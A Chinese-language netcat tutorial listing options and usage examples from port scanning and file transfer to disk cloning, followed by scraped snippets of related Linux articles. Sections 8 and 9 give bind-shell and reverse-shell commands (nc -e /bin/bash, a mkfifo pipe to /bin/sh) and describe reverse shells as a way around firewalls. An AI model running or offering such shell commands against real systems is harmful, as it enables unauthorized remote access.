ps.ubuntu自带的nc是netcat-openbsd版,不带-c/-e参数。
pss.在线Markdown编辑器的bug是怎么回事...“#”号依然显示着
##参数
想要连接到某处: nc [-options] hostname port[s] [ports] …
绑定端口等待连接: nc -l port [-options] [hostname] [port]
- -g<网关>:设置路由器跃程通信网关,最多设置8个;
- -G<指向器数目>:设置来源路由指向器,其数值为4的倍数;
- -h:在线帮助;
- -i<延迟秒数>:设置时间间隔,以便传送信息及扫描通信端口;
- -l:使用监听模式,监控传入的资料;
- -n:直接使用ip地址,而不通过域名服务器;
- -o<输出文件>:指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存;
- -p<通信端口>:设置本地主机使用的通信端口;
- -r:指定源端口和目的端口都进行随机的选择;
- -s<来源位址>:设置本地主机送出数据包的IP地址;
- -u:使用UDP传输协议;
- -v:显示指令执行过程;
- -w<超时秒数>:设置等待连线的时间;
- -z:使用0输入/输出模式,只在扫描通信端口时使用。
##用法
[A Server(192.168.1.1) B Client(192.168.1.2)]
####0.
连接到远程主机:
$nc -nvv 192.168.x.x 80
连到192.168.x.x的TCP80端口.
监听本地主机:
$nc -l 80
监听本机的TCP80端口.
超时控制:
多数情况我们不希望连接一直保持,那么我们可以使用 -w 参数来指定连接的空闲超时时间,该参数紧接一个数值,代表秒数,如果连接超过指定时间则连接会被终止。
Server
$nc -l 2389
Client
$ nc -w 10 localhost 2389
该连接将在 10 秒后中断。
注意: 不要在服务器端同时使用 -w 和 -l 参数,因为 -w 参数将在服务器端无效果。
####1.端口扫描
端口扫描经常被系统管理员和黑客用来发现在一些机器上开放的端口,帮助他们识别系统中的漏洞。
$nc -z -v -n 192.168.1.1 21-25
可以运行在TCP或者UDP模式,默认是TCP,-u参数调整为udp.
z 参数告诉netcat使用0 IO,连接成功后立即关闭连接, 不进行数据交换.
v 参数指详细输出.
n 参数告诉netcat 不要使用DNS反向查询IP地址的域名.
以上命令会打印21到25 所有开放的端口。
$nc -v 127.0.0.1 22
localhost [127.0.0.1] 22 (ssh) open
SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
"SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4"为Banner信息。Banner是一个文本,Banner是一个你连接的服务发送给你的文本信息。当你试图鉴别漏洞或者服务的类型和版本的时候,Banner信息是非常有用的。但是,并不是所有的服务都会发送banner.一旦你发现开放的端口,你可以容易的使用netcat 连接服务抓取他们的banner。
####2.Chat Server
假如你想和你的朋友聊聊,有很多的软件和信息服务可以供你使用。但是,如果你没有这么奢侈的配置,比如你在计算机实验室,所有的对外的连接都是被限制的,你怎样和整天坐在隔壁房间的朋友沟通那?不要郁闷了,netcat提供了这样一种方法,你只需要创建一个Chat服务器,一个预先确定好的端口,这样子他就可以联系到你了。
Server
$nc -l 20000
netcat 命令在20000端口启动了一个tcp 服务器,所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。
Client
$nc 192.168.1.1 20000
不管你在机器B上键入什么都会出现在机器A上。
####3.文件传输
大部分时间中,我们都在试图通过网络或者其他工具传输文件。有很多种方法,比如FTP,SCP,SMB等等,但是当你只是需要临时或者一次传输文件,真的值得浪费时间来安装配置一个软件到你的机器上嘛。假设,你想要传一个文件file.txt 从A 到B。A或者B都可以作为服务器或者客户端.
Server
$nc -l 20000 < file.txt
Client
$nc -n 192.168.1.1 20000 > file.txt
这里我们创建了一个服务器在A上并且重定向netcat的输入为文件file.txt,那么当任何成功连接到该端口,netcat会发送file的文件内容。
在客户端我们重定向输出到file.txt,当B连接到A,A发送文件内容,B保存文件内容到file.txt.
没有必要创建文件源作为Server,我们也可以相反的方法使用。像下面的我们发送文件从B到A,但是服务器创建在A上,这次我们仅需要重定向netcat的输出并且重定向B的输入文件。
B作为Server
Server
$nc -l 20000 > file.txt
Client
$nc 192.168.1.2 20000 < file.txt
####4.目录传输
发送一个文件很简单,但是如果我们想要发送多个文件,或者整个目录,一样很简单,只需要使用压缩工具tar,压缩后发送压缩包。
如果你想要通过网络传输一个目录从A到B。
Server
$tar -cvf – dir_name | nc -l 20000
Client
$nc -n 192.168.1.1 20000 | tar -xvf -
这里在A服务器上,我们创建一个tar归档包并且通过-在控制台重定向它,然后使用管道,重定向给netcat,netcat可以通过网络发送它。
在客户端我们下载该压缩包通过netcat 管道然后打开文件。
如果想要节省带宽传输压缩包,我们可以使用bzip2或者其他工具压缩。
Server
$tar -cvf – dir_name| bzip2 -z | nc -l 20000
通过bzip2压缩
Client
$nc -n 192.168.1.1 20000 | bzip2 -d |tar -xvf -
####5. 加密你通过网络发送的数据
如果你担心你在网络上发送数据的安全,你可以在发送你的数据之前用如mcrypt的工具加密。
Server
$nc localhost 20000 | mcrypt –flush –bare -F -q -d -m ecb > file.txt
使用mcrypt工具加密数据。
Client
$mcrypt –flush –bare -F -q -m ecb < file.txt | nc -l 20000
使用mcrypt工具解密数据。
以上两个命令会提示需要密码,确保两端使用相同的密码。
这里我们是使用mcrypt用来加密,使用其它任意加密工具都可以。
####6.流视频
虽然不是生成流视频的最好方法,但如果服务器上没有特定的工具,使用netcat,我们仍然有希望做成这件事。
Server
$cat video.avi | nc -l 20000
这里我们只是从一个视频文件中读入并重定向输出到netcat客户端
Client
$nc 192.168.1.1 20000 | mplayer -vo x11 -cache 3000 -
这里我们从socket中读入数据并重定向到mplayer。
####7,克隆一个设备
如果你已经安装配置一台Linux机器并且需要重复同样的操作对其他的机器,而你不想在重复配置一遍。不在需要重复配置安装的过程,只启动另一台机器的一些引导可以随身碟和克隆你的机器。
克隆Linux PC很简单,假如你的系统在磁盘/dev/sda上
Server
$dd if=/dev/sda | nc -l 20000
Client
$nc -n 192.168.1.1 20000 | dd of=/dev/sda
dd是一个从磁盘读取原始数据的工具,我通过netcat服务器重定向它的输出流到其他机器并且写入到磁盘中,它会随着分区表拷贝所有的信息。但是如果我们已经做过分区并且只需要克隆root分区,我们可以根据我们系统root分区的位置,更改sda 为sda1,sda2.等等。
####8.打开一个shell
我们已经用过远程shell-使用telnet和ssh,但是如果这两个命令没有安装并且我们没有权限安装他们,我们也可以使用netcat创建远程shell。
假设你的netcat支持 -c -e 参数(原生 netcat)
Server
$nc -l 20000 -e /bin/bash -i
Client
$nc 192.168.1.1 20000
这里我们已经创建了一个netcat服务器并且表示当它连接成功时执行/bin/bash
假如netcat 不支持-c 或者 -e 参数(openbsd netcat),我们仍然能够创建远程shell
Server
$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 20000 > /tmp/tmp_fifo
这里我们创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出,然后管道到netcat 运行的端口20000上。至此,我们已经把netcat的输出重定向到fifo文件中。
说明:
从网络收到的输入写到fifo文件中
cat 命令读取fifo文件并且其内容发送给sh命令
sh命令进程受到输入并把它写回到netcat。
netcat 通过网络发送输出到client
至于为什么会成功是因为管道使命令平行执行,fifo文件用来替代正常文件,因为fifo使读取等待而如果是一个普通文件,cat命令会尽快结束并开始读取空文件。
在客户端仅仅简单连接到服务器
Client
$nc -n 192.168.1.1 20000
你会得到一个shell提示符在客户端
####9.反向shell
反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务。
Server
$nc -l 20000
在客户端,简单地告诉netcat在连接完成后,执行shell。
Client
$nc 192.168.1.1 20000 -e /bin/bash
现在,什么是反向shell的特别之处呢
反向shell经常被用来绕过防火墙的限制,如阻止入站连接。例如,我有一个专用IP地址为192.168.1.1,我使用代理服务器连接到外部网络。如果我想从网络外部访问 这台机器如1.2.3.4的shell,那么我会用反向外壳用于这一目的。
####10.指定源端口
假设你的防火墙过滤除25端口外其它所有端口,你需要使用-p选项指定源端口。
Server
$nc -l 20000
Client
$nc 192.168.1.1 20000 25
使用1024以内的端口需要root权限。
该命令将在客户端开启25端口用于通讯,否则将使用随机端口。
####11.指定源地址
假设你的机器有多个地址,希望明确指定使用哪个地址用于外部数据通讯。我们可以在netcat中使用-s选项指定ip地址。
Server
$nc -u -l 20000 < file.txt
Client
$nc -u 192.168.1.1 20000 -s 172.31.100.5 > file.txt
该命令将绑定地址172.31.100.5。
####12.静态web页面服务器
新建一个网页,命名为somepage.html;
新建一个shell script:
while true; do
nc -l 80 -q 1 < somepage.html;
done
用root权限执行,然后在浏览器中输入127.0.0.1打开看看是否正确运行。
nc 指令通常都是給管理者進行除錯或測試等動作用的,所以如果只是單純需要臨時的網頁伺服器,使用 Python 的 SimpleHTTPServer 模組會比較方便。
####13.模拟HTTP Headers
$nc www.huanxiangwu.com 80
GET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser
HTTP/1.1 200 OK
Date: Tue, 16 Dec 2008 07:23:24 GMT
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8
Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html
[......]
在nc命令后,输入红色部分的内容,然后按两次回车,即可从对方获得HTTP Headers内容。
####13.Netcat支持IPv6
netcat 的 -4 和 -6 参数用来指定 IP 地址类型,分别是 IPv4 和 IPv6:
Server
$ nc -4 -l 2389
Client
$ nc -4 localhost 2389
然后我们可以使用 netstat 命令来查看网络的情况:
$ netstat | grep 2389
tcp 0 0 localhost:2389 localhost:50851 ESTABLISHED
tcp 0 0 localhost:50851 localhost:2389 ESTABLISHED
接下来我们看看IPv6 的情况:
Server
$ nc -6 -l 2389
Client
$ nc -6 localhost 2389
再次运行 netstat 命令:
$ netstat | grep 2389
tcp6 0 0 localhost:2389 localhost:33234 ESTABLISHED
tcp6 0 0 localhost:33234 localhost:2389 ESTABLISHED
前缀是 tcp6 表示使用的是 IPv6 的地址。
####14.在 Netcat 中禁止从标准输入中读取数据
该功能使用 -d 参数,请看下面例子:
Server
$ nc -l 2389
Client
$ nc -d localhost 2389
Hi
你输入的 Hi 文本并不会送到服务器端。
####15.强制 Netcat 服务器端保持启动状态
如果连接到服务器的客户端断开连接,那么服务器端也会跟着退出。
Server
$ nc -l 2389
Client
$ nc localhost 2389
^C
Server
$ nc -l 2389
$
上述例子中,但客户端断开时服务器端也立即退出。
我们可以通过 -k 参数来控制让服务器不会因为客户端的断开连接而退出。
Server
$ nc -k -l 2389
Client
$ nc localhost 2389
^C
Server
$ nc -k -l 2389
####16.配置 Netcat 客户端不会因为 EOF 而退出
Netcat 客户端可以通过 -q 参数来控制接收到 EOF 后隔多长时间才退出,该参数的单位是秒:
Client
$nc -q 5 localhost 2389
现在如果客户端接收到 EOF ,它将等待 5 秒后退出。
####17.手動使用 SMTP 協定寄信
在測試郵件伺服器是否正常時,可以使用這樣的方式手動寄送 Email:
$nc localhost 25 << EOF
HELO host.example.com
MAIL FROM: <user@host.example.com>
RCPT TO: <user2@host.example.com>
DATA
Body of email.
.
QUIT
EOF
####18.透過代理伺服器(Proxy)連線
這指令會使用 10.2.3.4:8080 這個代理伺服器,連線至 host.example.com 的42端口。
$nc -x10.2.3.4:8080 -Xconnect host.example.com 42
####19.使用 Unix Domain Socket
這行指令會建立一個 Unix Domain Socket,並接收資料:
$nc -lU /var/tmp/dsocket
相关推荐
CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) 命令大全 1. gpedit.msc-----组策略 2. sndrec32-------录音机 3. Nslookup-------IP地址侦测器 ,是一个 监测网络中 DNS...
本资料“Linux常用命令全集”正是针对这一需求,收集了大量常用且实用的Linux命令,旨在帮助用户提升工作效率。 1. **文件和目录管理**:在Linux中,`cd`用于切换目录,`ls`用来列出目录内容,`mkdir`创建新目录,`...
Linux是世界上最广泛使用的开源操作系统之一,它以其稳定性和灵活性闻名。..."Linux命令大全(修改版).chm"提供了一个方便的查询工具,帮助你快速找到所需命令的用法和参数,对于初学者和经验丰富的用户都非常有价值。
LinuxTool是一个开源项目,它收集并整理了Linux环境下常用的一些工具和它们对应的命令行用法。这些工具涵盖了系统管理、文件操作、网络通信、进程控制等多个方面。下面将详细介绍其中的一些核心知识点。 一、系统...
同时,可以使用`netstat -lpn`和`nc -zv localhost 1-65535`检查端口状态和开放情况。 4. **端口管理**: 在防火墙启用的情况下,通过编辑`/etc/sysconfig/iptables`配置文件,使用`iptables`命令来允许或拒绝特定...
了解并熟练运用这些Linux命令,将使你在Linux环境中如鱼得水,无论是日常使用还是系统管理,都能得心应手。Linux_Commands.chm文档是一个很好的学习资源,它可能包含了这些命令的详细解释和实例,建议仔细阅读并实践...
介绍了WebSphere Application Server (WAS)与NC5结合使用的安装流程。 **1WAS安装注意事项** 指出了在安装WAS过程中需要注意的事项。 **2单节点环境** 描述了单台服务器上WAS的安装配置方法。 **3集群环境...
nc_mod 是一个专门为 Linux 操作系统设计的内核模块,其主要功能是监控网络接口以及特定端口...如果你打算使用或修改 nc_mod,确保对 Linux 内核编程有一定的了解,并遵循安全编码的最佳实践,以免引入潜在的安全风险。
Linux中的进程可以通过ps命令查看,kill命令发送信号来结束进程,nohup让命令在后台持续运行,top显示实时系统状态,包括CPU使用率、内存使用情况以及进程信息。 七、网络配置与管理 在Linux中,网络配置文件通常...
例如,你可以使用`nc`命令启动一个简单的客户端,连接到服务器的特定端口: ``` nc -c <服务器IP> <端口号> ``` 2. `ab` (Apache Bench):这个工具主要用于HTTP服务器的压力测试,但也可以用于TCP服务器。你...
可以使用邮件客户端进行测试,或者通过命令行工具如 `telnet` 或 `nc` 连接SMTP端口,发送测试邮件。同样,验证POP3和IMAP服务是否可以成功接收邮件。 总结来说,在Linux系统下配置邮件服务器是一个涉及DNS解析、...
- **Linux系统**:编写shell脚本`runstats.sh`并使用crontab定时调度。 #### 三、DB2数据库连接驱动 本节讨论了用友NC6.5访问DB2数据库时所推荐使用的JDBC驱动类型及其配置。 - **推荐驱动**:DB2 Universal ...
- 使用`nc -vuz 192.168.2.15 514`命令检测A机器的UDP 514端口是否开放。 - 运行`netstat -anup`命令查看B机器上UDP端口的状态,确认514端口是否在监听状态。 - 可以编写一个循环脚本来扫描510到515端口,确保A...
本文将深入探讨如何使用Linux网络发送指令到服务器,并将服务器的结果发送回客户端进行输出,以及与C#编程语言的关联。 首先,让我们了解Linux网络的基本概念。Linux网络基于TCP/IP协议栈,它允许不同的计算机通过...
例如,使用`nc`(netcat)或`curl`命令可以测试服务器的可达性,`ssh`和`sftp`则用于安全地执行远程操作。 在系统监控方面,脚本可以帮助我们收集系统资源使用情况,如CPU、内存、磁盘空间等,通过`top`、`htop`、`...
1. **连接验证**:检查MongoDB服务是否正在运行,通过`nc`(netcat)或`telnet`命令尝试建立TCP连接到MongoDB默认端口(27017)。 2. **状态查询**:使用`mongo`命令行工具向MongoDB发送查询,获取数据库状态信息,...
"linux-tools"项目显然是一个收集和记录常用Linux工具的资源库,旨在帮助用户更好地理解和运用这些工具。 标题中的“penguin::bookmark_tabs:”可能是一种符号化表达,暗示着这个项目是关于Linux(通常用企鹅作为它...
本文将通过实训,介绍如何使用 Flume 监听收集网络端口数据,并将其打印出来。 实训目标 * 熟悉 Flume 的基本使用流程 * 了解 Flume 如何监听收集网络端口数据 实训环境 * 操作系统:CentOS 版本 Linux * 软件...
8. **日志查看**:`logcat`命令用于收集和查看Android系统的日志信息,对于开发者调试和问题排查非常有用。 9. **设备信息查询**:`dumpsys`可以获取系统服务的状态和设备信息,`wm`(window manager)命令用于调整...
为了方便后续的访问,我们在Kali Linux的hosts文件中添加了靶机的IP与域名绑定。 接着,我们进行了Web信息收集。利用dirb工具扫描了80和443端口,找到了登录界面和robots.txt文件。在robots.txt中,我们发现了...